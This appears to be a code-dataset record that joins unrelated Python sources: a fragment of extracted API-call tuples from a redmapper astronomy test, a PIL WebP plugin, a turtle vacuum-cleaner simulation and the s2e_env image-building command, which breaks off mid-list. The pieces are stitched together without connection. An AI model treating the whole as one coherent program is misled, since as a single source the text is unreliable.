'testing.assert_almost_equal', (['cent.q_cen', "tempcat[0]['QCEN'][tempcat[0]['GOOD']]", '(4)'], {}), "(cent.q_cen, tempcat[0]['QCEN'][tempcat[0][\n 'GOOD']], 4)\n", (1540, 1600), True, 'import numpy.testing as testing\n'), ((1604, 1666), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat', "tempcat[0]['PSAT']", '(4)'], {}), "(cent.p_sat, tempcat[0]['PSAT'], 4)\n", (1631, 1666), True, 'import numpy.testing as testing\n'), ((1675, 1735), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_fg', "tempcat[0]['PFG']", '(4)'], {}), "(cent.p_fg, tempcat[0]['PFG'], 4)\n", (1702, 1735), True, 'import numpy.testing as testing\n'), ((1744, 1821), 'numpy.testing.assert_array_equal', 'testing.assert_array_equal', (['cent.index', "tempcat[0]['USE'][tempcat[0]['GOOD']]"], {}), "(cent.index, tempcat[0]['USE'][tempcat[0]['GOOD']])\n", (1770, 1821), True, 'import numpy.testing as testing\n'), ((1965, 1986), 'redmapper.CenteringBCG', 'CenteringBCG', (['cluster'], {}), '(cluster)\n', (1977, 1986), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((2105, 2155), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.ra', '(150.55890608)'], {}), '(cent.ra, 150.55890608)\n', (2132, 2155), True, 'import numpy.testing as testing\n'), ((2164, 2214), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.dec', '(20.53794937)'], {}), '(cent.dec, 20.53794937)\n', (2191, 2214), True, 'import numpy.testing as testing\n'), ((2223, 2270), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen[0]', '(1.0)'], {}), '(cent.p_cen[0], 1.0)\n', (2250, 2270), True, 'import numpy.testing as testing\n'), ((2279, 2326), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen[0]', '(1.0)'], {}), '(cent.q_cen[0], 1.0)\n', (2306, 2326), True, 'import numpy.testing as testing\n'), ((2335, 2382), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat[0]', '(0.0)'], {}), '(cent.p_sat[0], 0.0)\n', (2362, 2382), True, 'import numpy.testing as testing\n'), ((2485, 2508), 'numpy.random.seed', 'random.seed', ([], {'seed': '(12345)'}), '(seed=12345)\n', (2496, 2508), False, 'from numpy import random\n'), ((2566, 2590), 'redmapper.CenteringRandom', 'CenteringRandom', (['cluster'], {}), '(cluster)\n', (2581, 2590), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((2709, 2768), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.ra[0]', '(150.57049502423266)'], {}), '(cent.ra[0], 150.57049502423266)\n', (2736, 2768), True, 'import numpy.testing as testing\n'), ((2777, 2837), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.dec[0]', '(20.604521924053167)'], {}), '(cent.dec[0], 20.604521924053167)\n', (2804, 2837), True, 'import numpy.testing as testing\n'), ((2846, 2893), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen[0]', '(1.0)'], {}), '(cent.p_cen[0], 1.0)\n', (2873, 2893), True, 'import numpy.testing as testing\n'), ((2902, 2949), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen[0]', '(1.0)'], {}), '(cent.q_cen[0], 1.0)\n', (2929, 2949), True, 'import numpy.testing as testing\n'), ((2958, 3005), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat[0]', '(0.0)'], {}), '(cent.p_sat[0], 0.0)\n', (2985, 3005), True, 'import numpy.testing as testing\n'), ((3118, 3141), 'numpy.random.seed', 'random.seed', ([], {'seed': '(12345)'}), '(seed=12345)\n', (3129, 3141), False, 'from numpy import random\n'), ((3199, 3232), 'redmapper.CenteringRandomSatellite', 'CenteringRandomSatellite', (['cluster'], {}), '(cluster)\n', (3223, 3232), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((3439, 3492), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.ra[0]', '(150.67510227)'], {}), '(cent.ra[0], 150.67510227)\n', (3466, 3492), True, 'import numpy.testing as testing\n'), ((3501, 3554), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.dec[0]', '(20.48011092)'], {}), '(cent.dec[0], 20.48011092)\n', (3528, 3554), True, 'import numpy.testing as testing\n'), ((3563, 3610), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen[0]', '(1.0)'], {}), '(cent.p_cen[0], 1.0)\n', (3590, 3610), True, 'import numpy.testing as testing\n'), ((3619, 3666), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen[0]', '(1.0)'], {}), '(cent.q_cen[0], 1.0)\n', (3646, 3666), True, 'import numpy.testing as testing\n'), ((3675, 3722), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat[0]', '(0.0)'], {}), '(cent.p_sat[0], 0.0)\n', (3702, 3722), True, 'import numpy.testing as testing\n'), ((3896, 3905), 'redmapper.Cluster', 'Cluster', ([], {}), '()\n', (3903, 3905), False, 'from redmapper import Cluster\n'), ((4099, 4415), 'numpy.zeros', 'np.zeros', (["tempcat[0]['RAS'].size"], {'dtype': "[('RA', 'f8'), ('DEC', 'f8'), ('DIST', 'f4'), ('R', 'f4'), ('P', 'f4'), (\n 'PFREE', 'f4'), ('PMEM', 'f4'), ('MAG', 'f4', 5), ('MAG_ERR', 'f4', 5),\n ('REFMAG', 'f4'), ('REFMAG_ERR', 'f4'), ('CHISQ', 'f4'), ('ZRED', 'f4'),\n ('ZRED_E', 'f4'), ('ZRED_CHISQ', 'f4')]"}), "(tempcat[0]['RAS'].size, dtype=[('RA', 'f8'), ('DEC', 'f8'), (\n 'DIST', 'f4'), ('R', 'f4'), ('P', 'f4'), ('PFREE', 'f4'), ('PMEM', 'f4'\n ), ('MAG', 'f4', 5), ('MAG_ERR', 'f4', 5), ('REFMAG', 'f4'), (\n 'REFMAG_ERR', 'f4'), ('CHISQ', 'f4'), ('ZRED', 'f4'), ('ZRED_E', 'f4'),\n ('ZRED_CHISQ', 'f4')])\n", (4107, 4415), True, 'import numpy as np\n'), ((5714, 5743), 'redmapper.GalaxyCatalog', 'GalaxyCatalog', (['temp_neighbors'], {}), '(temp_neighbors)\n', (5727, 5743), False, 'from redmapper import GalaxyCatalog\n'), ((965, 1015), 'os.path.join', 'os.path.join', (['file_path', '"""test_wcen_zred_data.fit"""'], {}), "(file_path, 'test_wcen_zred_data.fit')\n", (977, 1015), False, 'import os\n'), ((1113, 1164), 'os.path.join', 'os.path.join', (['file_path', '"""test_dr8_zlambdacorr.fit"""'], {}), "(file_path, 'test_dr8_zlambdacorr.fit')\n", (1125, 1164), False, 'import os\n'), ((3946, 3988), 'os.path.join', 'os.path.join', (['file_path', '"""testconfig.yaml"""'], {}), "(file_path, 'testconfig.yaml')\n", (3958, 3988), False, 'import os\n'), ((4021, 4071), 'os.path.join', 'os.path.join', (['file_path', '"""test_wcen_zred_data.fit"""'], {}), "(file_path, 'test_wcen_zred_data.fit')\n", (4033, 4071), False, 'import os\n'), ((5876, 5920), 'os.path.join', 'os.path.join', (['file_path', '"""test_dr8_pars.fit"""'], {}), "(file_path, 'test_dr8_pars.fit')\n", (5888, 5920), False, 'import os\n'), ((5988, 6027), 'os.path.join', 'os.path.join', (['file_path', '"""test_bkg.fit"""'], {}), "(file_path, 'test_bkg.fit')\n", (6000, 6027), False, 'import os\n'), ((6070, 6109), 'os.path.join', 'os.path.join', (['file_path', '"""test_bkg.fit"""'], {}), "(file_path, 'test_bkg.fit')\n", (6082, 6109), False, 'import os\n'), ((5624, 5639), 'numpy.radians', 'np.radians', (['(1.0)'], {}), '(1.0)\n', (5634, 5639), True, 'import numpy as np\n')] |
from PIL import Image
from PIL import ImageFile
from io import BytesIO
import _webp
def _accept(prefix):
return prefix[:4] == b"RIFF" and prefix[8:16] == b"WEBPVP8 "
class WebPImageFile(ImageFile.ImageFile):
format = "WEBP"
format_description = "WebP image"
def _open(self):
self.mode = "RGB"
data, width, height = _webp.WebPDecodeRGB(self.fp.read())
self.size = width, height
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, 'RGB')]
def _save(im, fp, filename):
if im.mode != "RGB":
raise IOError("cannot write mode %s as WEBP" % im.mode)
quality = im.encoderinfo.get("quality", 80)
data = _webp.WebPEncodeRGB(im.tostring(), im.size[0], im.size[1], im.size[0] * 3, float(quality))
fp.write(data)
Image.register_open("WEBP", WebPImageFile, _accept)
Image.register_save("WEBP", _save)
Image.register_extension("WEBP", ".webp")
Image.register_mime("WEBP", "image/webp")
| [
"PIL.Image.register_save",
"io.BytesIO",
"PIL.Image.register_extension",
"PIL.Image.register_mime",
"PIL.Image.register_open"
] | [((807, 858), 'PIL.Image.register_open', 'Image.register_open', (['"""WEBP"""', 'WebPImageFile', '_accept'], {}), "('WEBP', WebPImageFile, _accept)\n", (826, 858), False, 'from PIL import Image\n'), ((859, 893), 'PIL.Image.register_save', 'Image.register_save', (['"""WEBP"""', '_save'], {}), "('WEBP', _save)\n", (878, 893), False, 'from PIL import Image\n'), ((895, 936), 'PIL.Image.register_extension', 'Image.register_extension', (['"""WEBP"""', '""".webp"""'], {}), "('WEBP', '.webp')\n", (919, 936), False, 'from PIL import Image\n'), ((937, 978), 'PIL.Image.register_mime', 'Image.register_mime', (['"""WEBP"""', '"""image/webp"""'], {}), "('WEBP', 'image/webp')\n", (956, 978), False, 'from PIL import Image\n'), ((439, 452), 'io.BytesIO', 'BytesIO', (['data'], {}), '(data)\n', (446, 452), False, 'from io import BytesIO\n')] |
from turtle import Turtle, Screen
from random import choice
from time import sleep
from queue import SimpleQueue
w: int
w, h = (853, 480)
wn = Screen()
wn.screensize(w, h)
wn.bgcolor("#d3d3d3")
Room_state = {"Clean": "#FFFFFF",
"Dirty": "#b5651d"}
cleaned = 0
def filler(t, color, delay=0, vacclean = False):
global cleaned
t.fillcolor(color)
t.penup()
if color == Room_state['Clean']:
sleep(delay) #To avoid instant cleaning
if vacclean:
cleaned += 1
t.begin_fill()
t.circle(130)
t.end_fill()
def setup():
A = Turtle() # Draws Circle in A
B = Turtle() # Draws Circle in B
X = Turtle() # Text Below A
Y = Turtle() # Text Below B
A.ht()
B.ht()
X.ht()
Y.ht()
A.speed(100)
B.speed(100)
X.speed(100)
Y.speed(100)
A.penup()
B.penup()
X.penup()
Y.penup()
A.setpos(-w / 4, -120)
B.setpos(w / 4, -120)
X.setpos(-w / 4, -200)
Y.setpos(w / 4, -200)
A.pendown()
B.pendown()
filler(A, Room_state['Clean'], False)
filler(B, Room_state['Clean'], False)
# Creates rooms and boundary
t1 = Turtle()
t1.ht()
t1.speed(20)
t1.penup()
t1.setposition(w / 2, h / 2)
t1.pendown()
t1.pensize(10)
t1.right(90)
t1.forward(h)
t1.right(90)
t1.forward(w)
t1.right(90)
t1.forward(h)
t1.right(90)
t1.forward(w)
t1.backward(w / 2)
t1.right(90)
t1.pensize(5)
t1.forward(h - 90)
t1.penup()
t1.setpos(-w / 4, h / 2 - 70)
t1.write("Room A", align="center", font=("Arial", 20, "normal"))
t1.setpos(w / 4, h / 2 - 70)
t1.write("Room B", align="center", font=("Arial", 20, "normal"))
return A, B, X, Y
A, B, X, Y = setup()
# Vaccum Cleaner
C = Turtle()
C.speed(8)
C.penup()
C.shape("circle")
C.setpos(A.xcor(), A.ycor() + 130)
count = 1
iter = Turtle()
cleanwriter = Turtle()
iter.ht()
cleanwriter.ht()
iter.penup()
cleanwriter.penup()
iter.setpos(0, -h / 2 + 50)
cleanwriter.setpos(0, -h / 2 + 20)
room_state = list(Room_state.keys())
state = SimpleQueue()
state.put_nowait(((choice(room_state)), choice(room_state)))
while True:
iter.clear()
cleanwriter.clear()
iter.write("Iteration : " + str(count), align="center", font=("Arial", 16, "normal"))
cleanwriter.write("Times Cleaned : " + str(cleaned), align="center", font=("Arial", 16, "normal"))
condition = state.get_nowait()
stateA = condition[0]
stateB = condition[1]
X.clear()
Y.clear()
nextA = choice(room_state)
nextB = choice(room_state)
state.put_nowait((nextA, nextB))
filler(A, Room_state[stateA])
filler(B, Room_state[stateB])
X.write("Now : " + stateA + "\nNext : " + nextA, align="center", font=("Arial", 16, "normal"))
Y.write("Now : " + stateB + "\nNext : " + nextB, align="center", font=("Arial", 16, "normal"))
print("\nA : " + stateA, "\tB : " + stateB)
if stateA == 'Dirty' and stateB == 'Dirty':
if C.xcor() < 0:
print("Both Dirty, Cleaned A going to B")
# noinspection PyTypeChecker
filler(A, Room_state['Clean'], 0.5, True)
stateA = 'Clean'
C.setpos(B.xcor(), B.ycor() + 130)
# noinspection PyTypeChecker
filler(B, Room_state['Clean'], 0.5, True)
stateB = 'Clean'
elif C.xcor() > 0:
print("Both Dirty, Cleaned B going to A")
# noinspection PyTypeChecker
filler(B, Room_state['Clean'], 0.5, True)
stateB = 'Clean'
C.setpos(A.xcor(), A.ycor() + 130)
# noinspection PyTypeChecker
filler(A, Room_state['Clean'], 0.5, True)
stateA = 'Clean'
if stateA == 'Dirty':
print("Cleaned A")
C.goto(A.xcor(), A.ycor() + 130)
# noinspection PyTypeChecker
filler(A, Room_state['Clean'], 0.3, True)
elif stateB == 'Dirty':
print("Cleaned B")
C.goto(B.xcor(), B.ycor() + 130)
# noinspection PyTypeChecker
filler(B, Room_state['Clean'], 0.3, True)
count += 1
sleep(0.5) | [
"random.choice",
"time.sleep",
"turtle.Screen",
"queue.SimpleQueue",
"turtle.Turtle"
] | [((145, 153), 'turtle.Screen', 'Screen', ([], {}), '()\n', (151, 153), False, 'from turtle import Turtle, Screen\n'), ((1792, 1800), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1798, 1800), False, 'from turtle import Turtle, Screen\n'), ((1893, 1901), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1899, 1901), False, 'from turtle import Turtle, Screen\n'), ((1916, 1924), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1922, 1924), False, 'from turtle import Turtle, Screen\n'), ((2095, 2108), 'queue.SimpleQueue', 'SimpleQueue', ([], {}), '()\n', (2106, 2108), False, 'from queue import SimpleQueue\n'), ((592, 600), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (598, 600), False, 'from turtle import Turtle, Screen\n'), ((629, 637), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (635, 637), False, 'from turtle import Turtle, Screen\n'), ((666, 674), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (672, 674), False, 'from turtle import Turtle, Screen\n'), ((698, 706), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (704, 706), False, 'from turtle import Turtle, Screen\n'), ((1161, 1169), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1167, 1169), False, 'from turtle import Turtle, Screen\n'), ((2548, 2566), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2554, 2566), False, 'from random import choice\n'), ((2579, 2597), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2585, 2597), False, 'from random import choice\n'), ((4139, 4149), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (4144, 4149), False, 'from time import sleep\n'), ((429, 441), 'time.sleep', 'sleep', (['delay'], {}), '(delay)\n', (434, 441), False, 'from time import sleep\n'), ((2128, 2146), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2134, 2146), False, 'from random import choice\n'), ((2149, 2167), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2155, 2167), False, 'from random import choice\n')] |
"""
Copyright (c) 2017 Cyberhaven
Copyright (c) 2017 Dependable Systems Laboratory, EPFL
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import glob
import grp
import logging
import os
import pwd
import re
import socket
import time
from threading import Thread
import psutil
from psutil import NoSuchProcess
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import sh
from sh import ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import EnvCommand, CommandError
from s2e_env.utils import repos
from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, \
translate_image_name
logger = logging.getLogger('image_build')
def _get_user_groups(user_name):
"""
Get a list of groups for the user ``user_name``.
"""
groups = [g.gr_name for g in grp.getgrall() if user_name in g.gr_mem]
gid = pwd.getpwnam(user_name).pw_gid
groups.append(grp.getgrgid(gid).gr_name)
return groups
def _get_user_name():
"""
Get the current user.
"""
return pwd.getpwuid(os.getuid())[0]
def _user_belongs_to(group_name):
"""
Check that the current user belongs to the ``group_name`` group.
"""
user_name = _get_user_name()
groups = _get_user_groups(user_name)
return group_name in groups
def _raise_group_error(group_name):
raise CommandError(f'You must belong to the {group_name} group in order to build '
'images. Please run the following command, then logout '
'and login:\n\n'
f'\tsudo usermod -a -G {group_name} $(whoami)')
def _check_groups_docker():
"""
Check that the current user belongs to the required groups to both run S2E and build S2E images.
"""
if not _user_belongs_to('docker'):
_raise_group_error('docker')
def _check_groups_kvm():
"""Being member of KVM is required only when using KVM to build images"""
if not _user_belongs_to('libvirtd') and not _user_belongs_to('kvm'):
_raise_group_error('kvm')
def _check_virtualbox():
"""
Check if VirtualBox is running. VirtualBox conflicts with S2E's requirement for KVM, so VirtualBox must
*not* be running together with S2E.
"""
# Adapted from https://github.com/giampaolo/psutil/issues/132#issuecomment-44017679
# to avoid race conditions
for proc in psutil.process_iter():
try:
if proc.name() == 'VBoxHeadless':
raise CommandError('S2E uses KVM to build images. VirtualBox '
'is currently running, which is not '
'compatible with KVM. Please close all '
'VirtualBox VMs and try again.')
except NoSuchProcess:
pass
def _check_vmware():
"""
Check if VMWare is running. VMware conflicts with S2E's requirement for KVM, so VMWare must
*not* be running together with S2E.
"""
for proc in psutil.process_iter():
try:
if proc.name() == 'vmware-vmx':
raise CommandError('S2E uses KVM to build images. VMware '
'is currently running, which is not '
'compatible with KVM. Please close all '
'VMware VMs and try again.')
except NoSuchProcess:
pass
def _check_kvm():
"""
Check that the KVM interface exists. This is required by libs2e to communicate with QEMU.
"""
if not os.path.exists(os.path.join(os.sep, 'dev', 'kvm')):
raise CommandError('KVM interface not found - check that /dev/kvm '
'exists. Alternatively, you can disable KVM (-n '
'option) or download pre-built images (-d option)')
def _check_vmlinux():
"""
Check that /boot/vmlinux* files are readable. This is important for guestfish.
"""
try:
for f in glob.glob(os.path.join(os.sep, 'boot', 'vmlinu*')):
with open(f, 'rb'):
pass
except IOError:
raise CommandError('Make sure that the kernels in /boot are readable. '
'This is required for guestfish. Please run the '
'following command:\n\n'
'sudo chmod ugo+r /boot/vmlinu*') from None
# pylint: disable=no-member
def _check_cow(image_dir):
"""
Check that the file system that stores guest images supports copy-on-write.
"""
try:
src = f'{image_dir}/.cowcheck'
dst = f'{image_dir}/.cowcheck1'
sh.touch(src)
sh.cp('--reflink=always', src, dst)
return True
except Exception:
warn_msg = f"""
Copy-on-write check failed.
The file system where images are stored ({image_dir}) does not support copy-on-write.
It is recommended to use an XFS or BTRFS file system with copy-on-write enabled as a storage
location for S2E images, as this can save up to 60% of disk space. The building process checkpoints
intermediate build steps with cp --reflink=auto to make use of copy-on-write if it is available.
How to upgrade:
1. Create an XFS or BTRFS partition large enough to store the images that you need (~300 GB for all images).
Make sure you use reflink=1 to enable copy-on-write when running mkfs.xfs.
2. Create a directory for guest images on that partition (e.g., /mnt/disk1/images)
3. Delete the "images" folder in your S2E environment
4. Create in your S2E environment a symbolic link called "images" to the directory you created in step 2
"""
logger.warning(re.sub(r'^ {8}', '', warn_msg, flags=re.MULTILINE))
return False
finally:
sh.rm('-f', src)
sh.rm('-f', dst)
def _raise_invalid_image(image_name):
raise CommandError(f'Invalid image name: {image_name}. Run ``s2e image_build`` '
'to list available images')
def _get_base_image_and_app(image_name):
x = image_name.split('/')
if len(x) == 1:
return x[0], None
if len(x) == 2:
return x
raise CommandError(f'Invalid image name {image_name}')
def _has_app_image(image_names):
for name in image_names:
if '/' in name:
return True
return False
def _check_product_keys(image_descriptors, image_names):
missing_keys = []
for image_name in image_names:
image = image_descriptors[image_name]
if 'product_key' in image:
if not image['product_key']:
missing_keys.append(image_name)
ios = image_descriptors[image_name].get('os', {})
if 'product_key' in ios:
if not ios['product_key']:
missing_keys.append(image_name)
if missing_keys:
logger.error('The following images require a product key:')
for image in missing_keys:
logger.error(' * %s', image)
raise CommandError('Please update images.json and/or apps.json.')
def _check_iso(templates, app_templates, iso_dir, image_names):
for image_name in image_names:
base_image, app_name = _get_base_image_and_app(image_name)
descriptors = [templates[base_image]]
if app_name:
descriptors.append(app_templates[app_name])
for desc in descriptors:
iso = desc.get('iso', {})
if iso.get('url', ''):
continue
name = iso.get('name', '')
if not name:
continue
if not iso_dir:
raise CommandError(
'Please use the --iso-dir option to specify the path '
f'to a folder that contains {name}'
)
path = os.path.join(iso_dir, name)
if not os.path.exists(path):
raise CommandError(f'The image {image_name} requires {path}, which could not be found')
def _is_port_available(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def _start_ftp_server(image_path, port):
authorizer = DummyAuthorizer()
authorizer.add_anonymous(image_path, perm='elradfmwMT')
handler = FTPHandler
handler.authorizer = authorizer
handler.masquerade_address = '10.0.2.2'
# QEMU slirp won't let the guest reconnect if timeout happens, so we disable it
handler.timeout = None
server = FTPServer(("127.0.0.1", port), handler)
thread = Thread(target=_run_ftp_server, args=[server])
thread.daemon = True
thread.start()
time.sleep(1)
return server
def _run_ftp_server(server):
try:
server.serve_forever()
finally:
logger.info('FTP server terminated')
server.close_all()
def _get_archive_rules(image_path, rule_names):
if _has_app_image(rule_names):
raise CommandError('Building archives of app images is not supported yet')
archive_rules = []
for r in rule_names:
archive_rules.append(os.path.join(image_path, f'{r}.tar.xz'))
logger.info('The following archives will be built:')
for a in archive_rules:
logger.info(' * %s', a)
return archive_rules
def _download_images(image_path, image_names, templates):
if _has_app_image(image_names):
raise CommandError('Downloading of app images is not supported yet')
image_downloader = ImageDownloader(templates)
image_downloader.download_images(image_names, image_path)
logger.info('Successfully downloaded images: %s', ', '.join(image_names))
class Command(EnvCommand):
"""
Builds an image.
"""
help = 'Build an image.'
def __init__(self):
super().__init__()
self._headless = True
self._use_kvm = True
self._num_cores = 1
self._has_cow = False
def add_arguments(self, parser):
super().add_arguments(parser)
parser.add_argument('name',
help='The name of the image to build. If empty,'
' shows available images', nargs='*')
parser.add_argument('-g', '--gui', action='store_true',
help='Display QEMU GUI during image build')
parser.add_argument('-c', '--cores', required=False, default=2,
type=int,
help='The number of cores used when building the '
'VM image. Defaults to 2')
parser.add_argument('-x', '--clean', action='store_true',
help='Deletes all images and rebuild them from '
'scratch')
parser.add_argument('-a', '--archive', action='store_true',
help='Creates an archive for the specified image')
parser.add_argument('-p', '--ftp-port', required=False, default=15468, type=int,
help='Port for the internal FTP server to receive files from guest VMs during build')
parser.add_argument('-d', '--download', action='store_true',
help='Download image from the repository instead '
'of building it')
parser.add_argument('-i', '--iso-dir',
help='Path to folder that stores ISO files of Windows images')
parser.add_argument('-n', '--no-kvm', action='store_true',
help='Disable KVM during image build')
def handle(self, *args, **options):
# If DISPLAY is missing, don't use headless mode
if options['gui']:
self._headless = False
# If KVM has been explicitly disabled, don't use it during the build
if options['no_kvm']:
self._use_kvm = False
self._num_cores = options['cores']
# The path could have been deleted by a previous clean
if not os.path.exists(self.image_path()):
os.makedirs(self.image_path())
img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
if options['clean']:
self._invoke_make(img_build_dir, ['clean'])
return
image_names = options['name']
templates = get_image_templates(img_build_dir)
app_templates = get_app_templates(img_build_dir)
images, image_groups, image_descriptors = get_all_images(templates, app_templates)
if not image_names:
self._print_image_list(images, image_groups, image_descriptors)
print('\nRun ``s2e image_build <name>`` to build an image. '
'Note that you must run ``s2e build`` **before** building '
'an image')
return
image_names = translate_image_name(images, image_groups, image_names)
logger.info('The following images will be built:')
for image in image_names:
logger.info(' * %s', image)
if options['download']:
_download_images(self.image_path(), image_names, templates)
return
rule_names = image_names
if options['archive']:
rule_names = _get_archive_rules(self.image_path(), image_names)
iso_dir = os.path.abspath(options['iso_dir']) if options['iso_dir'] else None
# Check for optional product keys and iso directories.
# These may or may not be required, depending on the set of images.
_check_product_keys(image_descriptors, image_names)
_check_iso(templates, app_templates, iso_dir, image_names)
if self._use_kvm:
_check_kvm()
_check_groups_kvm()
_check_groups_docker()
_check_vmlinux()
self._has_cow = _check_cow(self.image_path())
if self._use_kvm:
_check_virtualbox()
_check_vmware()
if not _is_port_available(options['ftp_port']):
raise CommandError(f'localhost:{options["ftp_port"]} is not available. Check that the port is free or '
'specify a port with --ftp-port')
# Clone kernel if needed.
# This is necessary if the s2e env has been initialized with -b flag.
self._clone_kernel()
server = _start_ftp_server(self.image_path(), options['ftp_port'])
self._invoke_make(img_build_dir, rule_names, options['ftp_port'], iso_dir)
logger.success('Built image(s) \'%s\'', ' '.join(image_names))
server.close_all()
def _invoke_make(self, img_build_dir, rule_names, ftp_port=0, iso_dir=''):
env = os.environ.copy()
env['S2E_INSTALL_ROOT'] = self.install_path()
env['S2E_LINUX_KERNELS_ROOT'] = \
self.source_path(CONSTANTS['repos']['images']['linux'])
env['OUTDIR'] = self.image_path()
env['QEMU_FTP_PORT'] = str(ftp_port)
env['ISODIR'] = iso_dir if iso_dir else ''
env['DEBUG_INTERMEDIATE_RULES'] = '1' if self._has_cow else '0'
logger.debug('Invoking makefile with:')
logger.debug('export S2E_INSTALL_ROOT=%s', env['S2E_INSTALL_ROOT'])
logger.debug('export S2E_LINUX_KERNELS_ROOT=%s', env['S2E_LINUX_KERNELS_ROOT'])
logger.debug('export OUTDIR=%s', env['OUTDIR'])
logger.debug('export ISODIR=%s', env.get('ISODIR', ''))
logger.debug('export DEBUG_INTERMEDIATE_RULES=%s', env.get('DEBUG_INTERMEDIATE_RULES', ''))
if self._headless:
logger.warning('Image creation will run in headless mode. '
'Use --gui to see graphic output for debugging')
else:
env['GRAPHICS'] = ''
if not self._use_kvm:
env['QEMU_KVM'] = ''
logger.warning('Image build without KVM. This will be slow')
try:
make = sh.Command('make').bake(file=os.path.join(img_build_dir,
'Makefile'),
directory=self.image_path(),
_env=env, _fg=True)
make_image = make.bake(j=self._num_cores, r=True, warn_undefined_variables=True)
make_image(sorted(rule_names))
except ErrorReturnCode as e:
raise CommandError(e) from e
def _clone_kernel(self):
kernels_root = self.source_path(CONSTANTS['repos']['images']['linux'])
if os.path.exists(kernels_root):
logger.info('Kernel repository already exists in %s', kernels_root)
return
logger.info('Cloning kernels repository to %s', kernels_root)
kernels_repo = CONSTANTS['repos']['images']['linux']
repos.git_clone_to_source(self.env_path(), kernels_repo)
def _print_image_list(self, images, image_groups, image_descriptors):
img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
templates = get_image_templates(img_build_dir)
if not templates:
images_json_path = os.path.join(img_build_dir, 'images.json')
raise CommandError('No images available to build. Make sure that '
f'{images_json_path} exists and is valid')
def get_max_len(lst):
ret = 0
for item in lst:
if len(item) > ret:
ret = len(item)
return ret
print('Available image groups:')
max_group_len = get_max_len(image_groups)
for group in image_groups:
print(f' * {group:{max_group_len}} - Build {group} images')
print('\nAvailable images:')
max_image_len = get_max_len(images)
for image in sorted(images):
print(f' * {image:{max_image_len}} - {image_descriptors[image]["name"]}')
def _print_apps_list(self):
img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
app_templates = get_app_templates(img_build_dir)
if not app_templates:
apps_json_path = os.path.join(img_build_dir, 'apps.json')
raise CommandError('No apps available to build. Make sure that '
f'{apps_json_path} exists and is valid')
print('Available applications:')
for app_template, desc in sorted(app_templates.items()):
for base_image in desc['base_images']:
print(f' * {base_image}/{app_template} - {desc["name"]}')
| [
"logging.getLogger",
"s2e_env.utils.images.ImageDownloader",
"sh.touch",
"os.getuid",
"time.sleep",
"s2e_env.utils.images.get_image_templates",
"sh.cp",
"s2e_env.utils.images.translate_image_name",
"s2e_env.utils.images.get_app_templates",
"os.path.exists",
"pwd.getpwnam",
"sh.rm",
